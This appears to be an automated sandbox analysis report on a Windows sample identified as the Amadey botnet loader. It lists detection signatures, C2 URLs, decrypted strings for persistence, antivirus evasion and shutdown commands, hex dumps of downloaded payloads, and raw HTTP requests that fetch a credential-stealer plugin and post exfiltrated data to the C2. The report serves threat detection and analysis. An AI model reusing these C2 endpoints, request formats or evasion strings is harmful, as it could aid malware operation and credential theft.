Windows Analysis Report
C4v61Eu50U.exe

Overview

General Information

Sample name: C4v61Eu50U.exe
renamed because original name is a hash value
Original sample name: 11dcd8e017b0e067e922cfb6507a8dde.exe
Analysis ID: 1427158
MD5: 11dcd8e017b0e067e922cfb6507a8dde
SHA1: 80c4e499c9666401a0f9099482c7fa9debe006d5
SHA256: 2809ff11620a7793560052c4a9c7f2b520b608f3d32c7722133cbeb60e5e9d70
Tags: 32Amadeyexetrojan
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: C4v61Eu50U.exe Avira: detected
Found malware configuration
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack Malware Configuration Extractor: Amadey {"C2 url": "topgamecheats.dev/j4Fvskd3/index.php", "Version": "4.18"}
Multi AV Scanner detection for domain / URL
Source: topgamecheats.dev Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/vidar.exe Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/build.dll# Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1 Virustotal: Detection: 21% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/index.php Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/build.dll Virustotal: Detection: 22% Perma Link
Source: topgamecheats.dev/j4Fvskd3/index.php Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll Virustotal: Detection: 11% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dlly Virustotal: Detection: 20% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/index.php: Virustotal: Detection: 20% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Virustotal: Detection: 34% Perma Link
Multi AV Scanner detection for submitted file
Source: C4v61Eu50U.exe ReversingLabs: Detection: 31%
Source: C4v61Eu50U.exe Virustotal: Detection: 38% Perma Link
Machine Learning detection for sample
Source: C4v61Eu50U.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: topgamecheats.dev
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: /j4Fvskd3/index.php
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: S-%lu-
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: 154561dcbf
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Dctooux.exe
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Startup
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: cmd /C RMDIR /s/q
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: rundll32
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Programs
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: %USERPROFILE%
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: cred.dll|clip.dll|
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: http://
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: https://
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: /Plugins/
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: &unit=
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: shell32.dll
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: kernel32.dll
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: GetNativeSystemInfo
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ProgramData\
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: AVAST Software
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Kaspersky Lab
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Panda Security
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Doctor Web
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: 360TotalSecurity
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Bitdefender
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Norton
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Sophos
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Comodo
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: WinDefender
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: 0123456789
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ------
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ?scr=1
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ComputerName
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: -unicode-
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: VideoID
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: DefaultSettings.XResolution
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: DefaultSettings.YResolution
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ProductName
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: CurrentBuild
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: rundll32.exe
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: "taskkill /f /im "
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: " && timeout 1 && del
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: && Exit"
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: " && ren
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: Powershell.exe
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: shutdown -s -t 0
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: random
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ~L$v(g
Source: 20.2.Dctooux.exe.4930e67.1.raw.unpack String decryptor: ~L$v(g

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Unpacked PE file: 0.2.C4v61Eu50U.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 20.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 28.2.Dctooux.exe.400000.0.unpack
Uses 32bit PE files
Source: C4v61Eu50U.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49745 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 93.123.39.96:80 -> 192.168.2.4:49745
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49745 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49752 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49753 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49757 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49758 -> 93.123.39.96:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: topgamecheats.dev/j4Fvskd3/index.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Mon, 11 Mar 2024 21:14:27 GMTetag: "65ef7433-139e00"accept-ranges: bytescontent-length: 1285632date: Wed, 17 Apr 2024 04:30:14 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 b3 5a e9 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Wed, 17 Apr 2024 03:31:34 GMTetag: "661f4296-4b200"accept-ranges: bytescontent-length: 307712date: Wed, 17 Apr 2024 04:30:17 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7c ff 78 ed 38 9e 16 be 38 9e 16 be 38 9e 16 be 26 cc 83 be 29 9e 16 be 26 cc 95 be 5f 9e 16 be 26 cc 92 be 11 9e 16 be 1f 58 6d be 3b 9e 16 be 38 9e 17 be 56 9e 16 be 26 cc 9c be 39 9e 16 be 26 cc 82 be 39 9e 16 be 26 cc 87 be 39 9e 16 be 52 69 63 68 38 9e 16 be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0a 97 31 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a4 00 00 00 8c 82 02 00 00 00 00 21 18 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 82 02 00 04 00 00 67 fa 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc bc 03 00 28 00 00 00 00 00 82 02 4e db 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3d a3 00 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 05 03 00 00 c0 00 00 00 06 03 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 23 7e 02 00 d0 03 00 00 28 00 00 00 ae 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4e db 00 00 00 00 82 02 00 dc 00 00 00 d6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Mon, 11 Mar 2024 21:14:32 GMTetag: "65ef7438-1b600"accept-ranges: bytescontent-length: 112128date: Wed, 17 Apr 2024 04:30:17 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b5 5a e9 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Wed, 17 Apr 2024 03:40:32 GMTetag: "661f44b0-3ce00"accept-ranges: bytescontent-length: 249344date: Wed, 17 Apr 2024 04:30:23 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1a b3 73 4f 5e d2 1d 1c 5e d2 1d 1c 5e d2 1d 1c 31 a4 83 1c 51 d2 1d 1c 31 a4 b7 1c 16 d2 1d 1c 57 aa 9e 1c 5b d2 1d 1c 57 aa 8e 1c 52 d2 1d 1c de ab 1c 1d 5d d2 1d 1c 5e d2 1c 1c 2c d2 1d 1c 31 a4 b6 1c 75 d2 1d 1c 31 a4 86 1c 5f d2 1d 1c 31 a4 80 1c 5f d2 1d 1c 52 69 63 68 5e d2 1d 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 96 44 1f 66 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0a 00 00 b4 02 00 00 16 01 00 00 00 00 00 90 11 02 00 00 10 00 00 00 d0 02 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 25 00 00 04 00 00 45 a0 04 00 02 00 40 00 c0 17 53 02 58 98 00 00 c0 17 53 02 58 98 00 00 00 00 00 00 10 00 00 00 b0 7e 03 00 42 00 00 00 40 77 03 00 a0 00 00 00 00 b0 24 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 24 00 30 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 01 b3 02 00 00 10 00 00 00 b4 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 ae 00 00 00 d0 02 00 00 b0 00 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 2e 21 00 00 80 03 00 00 10 00 00 00 68 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 00 00 00 00 b0 24 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 02 52 00 00 00 c0 24 00 00 54 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU0MTE=Host: topgamecheats.devContent-Length: 85563Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/cred64.dll HTTP/1.1Host: topgamecheats.dev
